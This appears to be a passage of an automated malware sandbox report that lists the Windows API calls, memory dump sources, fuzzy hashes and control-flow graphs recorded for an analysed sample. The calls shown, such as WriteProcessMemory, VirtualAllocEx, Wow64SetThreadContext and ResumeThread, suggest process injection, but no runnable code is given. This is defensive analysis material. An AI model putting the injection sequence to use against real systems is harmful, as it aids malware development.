                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05109102
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: e1e644692633be4921cfa48494169336a68c713a3881fb3e284a2a98755becf2
                                              • Instruction ID: f466bae728438d46276dfb5324153938e7c64d36d6c29ef83683c261a05753d5
                                              • Opcode Fuzzy Hash: e1e644692633be4921cfa48494169336a68c713a3881fb3e284a2a98755becf2
                                              • Instruction Fuzzy Hash: D35134B1C043599FDB14CFA9C8A4ADEBFB5FF48310F24812AE418AB251D7B49885CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 883 5108450-5109056 885 5109061-5109068 883->885 886 5109058-510905e 883->886 887 5109073-5109112 CreateWindowExW 885->887 888 510906a-5109070 885->888 886->885 890 5109114-510911a 887->890 891 510911b-5109153 887->891 888->887 890->891 895 5109160 891->895 896 5109155-5109158 891->896 897 5109161 895->897 896->895 897->897
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05109102
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: f91af2b4e37b3cf0d3d7afa52751dff1745ac2831c5a1f3467cd9cb49ad51841
                                              • Instruction ID: e5a056925d815e62285d94c60397288ebdee0b856899e7844d666d4ee5c6e565
                                              • Opcode Fuzzy Hash: f91af2b4e37b3cf0d3d7afa52751dff1745ac2831c5a1f3467cd9cb49ad51841
                                              • Instruction Fuzzy Hash: A151D0B1D00309DFDB14CF9AC894ADEBBB5FF48310F24812AE819AB255D7B5A845CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 898 5108fe4-5109056 899 5109061-5109068 898->899 900 5109058-510905e 898->900 901 5109073-51090ab 899->901 902 510906a-5109070 899->902 900->899 903 51090b3-5109112 CreateWindowExW 901->903 902->901 904 5109114-510911a 903->904 905 510911b-5109153 903->905 904->905 909 5109160 905->909 910 5109155-5109158 905->910 911 5109161 909->911 910->909 911->911
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05109102
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID:
                                              • API String ID: 716092398-0
                                              • Opcode ID: 7b37bea33048487967153d9c8323dda0eeb86182dfaa73eb8512bf5740f0140a
                                              • Instruction ID: f02d96e5f8b2915830d41bbd2d777f2ee2f3c62f38ee0206437cf51c769ea7bd
                                              • Opcode Fuzzy Hash: 7b37bea33048487967153d9c8323dda0eeb86182dfaa73eb8512bf5740f0140a
                                              • Instruction Fuzzy Hash: B551CEB1D00309DFDB14CFA9C994ADEFBB5BF48310F24812AE819AB255D7B59885CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered as an image in the report; the executed / not-executed colouring is not reproduced here)
                                              • Basic blocks: 912 e45e2c-e45e38; 913 e45dea; 914 e45e3a-e45e3f; 916 e45dec-e45ded; 917 e45e59-e45e5b; 915 e45eb1-e45ee3; 919 e45def-e45df0; 920 e45dc4-e45de4; 921 e45df2; 923 e45df3-e45df7; 926 e45de6-e45de9; 924 e45e08; 925 e45df9-e45e05; 928 e45e09
                                              • Edges: 912->913, 912->914, 913->916, 913->917, 914->915, 916->919, 917->915, 919->920, 919->921, 920->923, 920->926, 921->923, 923->924, 923->925, 924->928, 925->924, 926->923, 928->928
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ba88af04c5bcb9b85207ac7f8bdd21075ef412e3e0fcda3cc42bf8f2a86f0d3
                                              • Instruction ID: a5caed3cc7bc1edd03f07038211a14dfa25c4b01f334b64ed0f807771d9d2c8c
                                              • Opcode Fuzzy Hash: 2ba88af04c5bcb9b85207ac7f8bdd21075ef412e3e0fcda3cc42bf8f2a86f0d3
                                              • Instruction Fuzzy Hash: 3F31DD72C04A49CFDB15CBA8D8087EEBBB0FF46319F24418AC044BB256C776A90ACF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered as an image in the report; the executed / not-executed colouring is not reproduced here)
                                              • Basic blocks: 929 e45cb4-e45d34; 931 e45d37-e45d81 (CreateActCtxA); 933 e45d83-e45d89; 934 e45d8a-e45de4; 942 e45de6-e45de9; 943 e45df3-e45df7; 944 e45e08; 945 e45df9-e45e05; 947 e45e09
                                              • Edges: 929->931, 931->933, 931->934, 933->934, 934->942, 934->943, 942->943, 943->944, 943->945, 944->947, 945->944, 947->947
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E45D71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 6cd437902fc0a1dff965facbdf53c4437c1fa3b46932d6a89e64430ba833910c
                                              • Instruction ID: b0180b03f4f0b907f8451c29a55ba9df1590c78d4177bc7f22989295ee936a97
                                              • Opcode Fuzzy Hash: 6cd437902fc0a1dff965facbdf53c4437c1fa3b46932d6a89e64430ba833910c
                                              • Instruction Fuzzy Hash: 634101B1C00A19CFDB24DFA9C9447DEBBB1BF49304F20806AC418BB265DB756946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered as an image in the report; the executed / not-executed colouring is not reproduced here)
                                              • Basic blocks: 948 51085a4-510b5fc; 951 510b602-510b607; 952 510b6ac-510b6cc (call 510847c); 954 510b609-510b640; 955 510b65a-510b692 (CallWindowProcW); 959 510b6cf-510b6dc; 961 510b642-510b648; 962 510b649-510b658; 956 510b694-510b69a; 957 510b69b-510b6aa
                                              • Edges: 948->951, 948->952, 951->954, 951->955, 952->959, 954->961, 954->962, 955->956, 955->957, 956->957, 957->959, 961->962, 962->959
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 0510B681
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 29f70b31fa84cc1f6ad2eb109dee6ab786eed5ed96ad2892f6911773d79b8f4f
                                              • Instruction ID: 8fc617b7d7026f176b3dc2b3a1a39e5d8e4fb60e8c9bc8af9e7e70d928878cfa
                                              • Opcode Fuzzy Hash: 29f70b31fa84cc1f6ad2eb109dee6ab786eed5ed96ad2892f6911773d79b8f4f
                                              • Instruction Fuzzy Hash: F74127B4904209DFDB14CF99C488AAEBBF6FF88314F24C459D559A7361D374E845CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered as an image in the report; the executed / not-executed colouring is not reproduced here)
                                              • Basic blocks: 965 e44608-e45d81 (CreateActCtxA); 969 e45d83-e45d89; 970 e45d8a-e45de4; 978 e45de6-e45de9; 979 e45df3-e45df7; 980 e45e08; 981 e45df9-e45e05; 983 e45e09
                                              • Edges: 965->969, 965->970, 969->970, 970->978, 970->979, 978->979, 979->980, 979->981, 980->983, 981->980, 983->983
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E45D71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2016607822.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_e40000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7e8fe0507c16439fdf5a2f3f3f416b5c00c83de49955689cd50577312ba98ec6
                                              • Instruction ID: 55479e9758d60e47d530c23415dd83d7a98528800d84334aa72f5505b79cb6b6
                                              • Opcode Fuzzy Hash: 7e8fe0507c16439fdf5a2f3f3f416b5c00c83de49955689cd50577312ba98ec6
                                              • Instruction Fuzzy Hash: 9241F1B1C00B19CBDB24DFA9C948BDEBBB5BF48304F20806AD408BB255DB756946CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D07618
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a1ed119c5b6c18670a35d704bc68f4fa4ade70dd7018eb5a4ea948afeda16886
                                              • Instruction ID: 98c09e6accca273e95a7b74f87622040eb27d60dd337416b461d6a5231258f14
                                              • Opcode Fuzzy Hash: a1ed119c5b6c18670a35d704bc68f4fa4ade70dd7018eb5a4ea948afeda16886
                                              • Instruction Fuzzy Hash: 7F3168719003499FCB10CFA9C885BDEBFF5FF48310F10842AE919A7290D778A944CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D07618
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: eea552dad6059a88a00bff4a7c3b6e55d1b4ff2b6c5abfda2a5169b90daaf657
                                              • Instruction ID: 48403d222e10c3b9e67668b990dd1490a6ef2bdbba9d3648870824cf8bbe6c91
                                              • Opcode Fuzzy Hash: eea552dad6059a88a00bff4a7c3b6e55d1b4ff2b6c5abfda2a5169b90daaf657
                                              • Instruction Fuzzy Hash: BA2139B59003099FCB10DFADC885BEEBBF5FF48310F10842AE919A7240D778A944CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05D076F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 9f4fa32dfd2e8beaea3af43c7301d54281aa6d11c93bc6523ebfd1ea9de8f29a
                                              • Instruction ID: 67c215683c6d3af94b36116d1573a73b3ceefa6e87a5e4967394854245dc4139
                                              • Opcode Fuzzy Hash: 9f4fa32dfd2e8beaea3af43c7301d54281aa6d11c93bc6523ebfd1ea9de8f29a
                                              • Instruction Fuzzy Hash: 312128B18003499FDB10DFAAC885BEEFBF5FF48310F50842AE519A7250D778A945CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05104A2E,?,?,?,?,?), ref: 05104AEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 3db392b8d27c838db68eb3a6e030b9554d54e0bdad80e3719eff91537a71e8d5
                                              • Instruction ID: cb6dd5f08f0de21ee391bf2f4181b2502c0a580321e59af532da8abc818e43e0
                                              • Opcode Fuzzy Hash: 3db392b8d27c838db68eb3a6e030b9554d54e0bdad80e3719eff91537a71e8d5
                                              • Instruction Fuzzy Hash: 2221E5B5900248DFDB10DF9AD584ADEBBF9FB48310F14801AE915A3350D379A950CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05104A2E,?,?,?,?,?), ref: 05104AEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f6587f740d3e174c49d002ff019aa0a9f8d593c6b17fa637ee6fc14725bfaec8
                                              • Instruction ID: 4337ab119f585f1120ad7efd46a93e34151dd29e2e4ad1a3a0e99f02ab444ea2
                                              • Opcode Fuzzy Hash: f6587f740d3e174c49d002ff019aa0a9f8d593c6b17fa637ee6fc14725bfaec8
                                              • Instruction Fuzzy Hash: 6821E5B5900248DFDB10CF9AD585AEEBBF8FB48310F14841AE918A3350D378A950CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05D076F8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 255f2f28ba0ef680ac3286d431ad1db502ed5138120edf75a1125788de9809a9
                                              • Instruction ID: f67a5a107e453a9c590f3c725441cea24ceb3bdac7c6b54c31c5971c4d4427aa
                                              • Opcode Fuzzy Hash: 255f2f28ba0ef680ac3286d431ad1db502ed5138120edf75a1125788de9809a9
                                              • Instruction Fuzzy Hash: 8B2128B18002499FCB10DFAAC881AEEFBF5FF48310F50842AE519A7250D778A540CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D0746E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 7fca9495dab77c1188a146fcd00f0332e62a88e5e1dae29da1350d4773e1fe9e
                                              • Instruction ID: 1fd957027228ef2f1c780ebd40a36aff23abd7dc05e90baeda6177563fed53e9
                                              • Opcode Fuzzy Hash: 7fca9495dab77c1188a146fcd00f0332e62a88e5e1dae29da1350d4773e1fe9e
                                              • Instruction Fuzzy Hash: 022115B19002098FDB50DFAEC485BEEBBF4FF48314F14842AD559A7240DB78A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05D0746E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 0d012e10325529d02a1dda2055ff2031b6ae6f016137f0b632fe1a67270a8cea
                                              • Instruction ID: 25cbb1845e91514191900f3c1e3fdf1cb469eec4c151481b0429c582e702d9a1
                                              • Opcode Fuzzy Hash: 0d012e10325529d02a1dda2055ff2031b6ae6f016137f0b632fe1a67270a8cea
                                              • Instruction Fuzzy Hash: 232125B59002098FDB10DFA9C5857EEBBF4EF48214F14842AD459A7241DB78A985CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05102861,00000800,00000000,00000000), ref: 05102A72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: f388eef304ffb4e20268562a56505e9c62582fcf4a9f457077b44a99096a2c02
                                              • Instruction ID: 9ba3a89051b58414afb699071e90b5c13efc3ea6eb6e4ba88fa321dabf95644c
                                              • Opcode Fuzzy Hash: f388eef304ffb4e20268562a56505e9c62582fcf4a9f457077b44a99096a2c02
                                              • Instruction Fuzzy Hash: 1D1133B6C00219CFDB20CF9AC448A9EFBF4EB48310F10842AE429A7640C7B9A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,05102861,00000800,00000000,00000000), ref: 05102A72
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 1a0ea0e17fd32777b5c115cf3f36d4d6c9d7f4c178bcc2e3ee15ed33b2eae78e
                                              • Instruction ID: f6eacda014253b72792a9ba500a001b89bdc17d6125972083adcf4ecb9f49493
                                              • Opcode Fuzzy Hash: 1a0ea0e17fd32777b5c115cf3f36d4d6c9d7f4c178bcc2e3ee15ed33b2eae78e
                                              • Instruction Fuzzy Hash: F61133BA800249CFDB20CFAAC548ADEFBF4AB48310F14852AD429A7610C779A545CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05D07536
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 8d132619043b32d11eaebcdc41b98e04bc91b5d0c722341b2d34890eea6250c0
                                              • Instruction ID: e3c6620b4b0baac2bf3db057ec111a6caf40a807df2846fb88f33adb95db4324
                                              • Opcode Fuzzy Hash: 8d132619043b32d11eaebcdc41b98e04bc91b5d0c722341b2d34890eea6250c0
                                              • Instruction Fuzzy Hash: 621126B69002499FCB10DFA9C945BEEBFF5FF88310F14881AE519A7250C779A541CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05D07536
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: e0a81884747c90ceef94cb1db633a4bba4e969660c39cbcb44918d28eefcc944
                                              • Instruction ID: 43edce13dd25f75ad724de93138c3fb92f687d77bc2834f39425f549001ee990
                                              • Opcode Fuzzy Hash: e0a81884747c90ceef94cb1db633a4bba4e969660c39cbcb44918d28eefcc944
                                              • Instruction Fuzzy Hash: 471126759002499FCB10DFAAC845BEEBFF5EF88310F10841AE519A7250C779A540CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a88216f05db83d72503b5201e19a1765e9734b557c79e78edee8dbabbba81bb7
                                              • Instruction ID: 26799376b8d8faefd507be349924fbee041c4f3894e972fa454c439ccbae83e2
                                              • Opcode Fuzzy Hash: a88216f05db83d72503b5201e19a1765e9734b557c79e78edee8dbabbba81bb7
                                              • Instruction Fuzzy Hash: A91146B1D002488BCB20DFAAC4457EEFBF9EF88314F24841AD519A7240CB39A944CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a84ca0d5dfbf8fc0bc612e109fc648ffc47b050a6a23a44b7600f761e29f34dd
                                              • Instruction ID: bacea7b80a2081c787d3dd9fb3e5684ffe5aa17702c4bb0617732072f7d1c1ac
                                              • Opcode Fuzzy Hash: a84ca0d5dfbf8fc0bc612e109fc648ffc47b050a6a23a44b7600f761e29f34dd
                                              • Instruction Fuzzy Hash: E91128B19002498FCB20DFAAC4457EEFBF5EF88314F20841AD559A7240CB79A544CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05D0BB6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 07b8f67dff76d7a12f4b781a2a50d22ca4eb43a73bead1c21c65f1096bd611b5
                                              • Instruction ID: 50ec8d9db3b6318749e4f4199d366858fa308999238388fd5c240c89c6ae088c
                                              • Opcode Fuzzy Hash: 07b8f67dff76d7a12f4b781a2a50d22ca4eb43a73bead1c21c65f1096bd611b5
                                              • Instruction Fuzzy Hash: 391103B58007499FDB10DF9AD889BDEFBF8FB48720F10841AE518A7250D379A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 05D0BB6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2032631383.0000000005D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5d00000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 64d6886edd09939fb71441d353bc0bc1917866cf148459dcee4a037b5281bdb3
                                              • Instruction ID: 960fc0ba77f19779294d2fe9a8533a56eff0c4603d61c2593d4a3754d0c66fd1
                                              • Opcode Fuzzy Hash: 64d6886edd09939fb71441d353bc0bc1917866cf148459dcee4a037b5281bdb3
                                              • Instruction Fuzzy Hash: 0D11F5B58043499FDB10DF99D445BDEBBF8EB48310F10845AE518A7250C379A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 051027E6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2028643584.0000000005100000.00000040.00000800.00020000.00000000.sdmp, Offset: 05100000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_5100000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 033b3aa42baa359a8726fa71c2266b0b9c4582e7262dc8e3efee197d4418bbd2
                                              • Instruction ID: bb7557d51ad28a3f8db7f3295a6e3d3a6800d729053ced99ac3dac23e864c85a
                                              • Opcode Fuzzy Hash: 033b3aa42baa359a8726fa71c2266b0b9c4582e7262dc8e3efee197d4418bbd2
                                              • Instruction Fuzzy Hash: 1111E0B9C006498FCB10DF9AD448ADEFBF8EF89310F10846AD829B7250D379A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 85fc898e7ce12870dba314df17a30079a7a29e1d4a60901b995ac2b6b8e11244
                                              • Instruction ID: 545439c9ae6b9050f8b18379d1fb2031af2c3fdf806dc2d4a620d0ca1fb1e451
                                              • Opcode Fuzzy Hash: 85fc898e7ce12870dba314df17a30079a7a29e1d4a60901b995ac2b6b8e11244
                                              • Instruction Fuzzy Hash: D631AF7554C3809FD703DF20D894715BFB2AB57314F1885EAC8868B6A3C23A980ACB72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb5259e0bee6343a0efc9f319110e37da8e9b47ae3b7b729e157ac0c4d83ab07
                                              • Instruction ID: 7aecd3082d249cda79be0a9571e372305e6ffcf2418007d66fb19acae6fda2f5
                                              • Opcode Fuzzy Hash: bb5259e0bee6343a0efc9f319110e37da8e9b47ae3b7b729e157ac0c4d83ab07
                                              • Instruction Fuzzy Hash: 812191755483808FD702CF14D980715BF72EB56314F28C5EAD8458B6A3C33A981ACB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c2d84a01322a29dc8a92e3ef93d1caebea4030179cf1fb704244f812b7d97e1
                                              • Instruction ID: f908ebbf1aeae509e7b373f61e4564c9c0ba1ee9414dd07572e7b240eda7afc3
                                              • Opcode Fuzzy Hash: 0c2d84a01322a29dc8a92e3ef93d1caebea4030179cf1fb704244f812b7d97e1
                                              • Instruction Fuzzy Hash: B0210471504304DFDB04DF24D9C0B26BB66FB89314F24C56DD94A4B796C33AD846CAB2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2014838056.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_dad000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
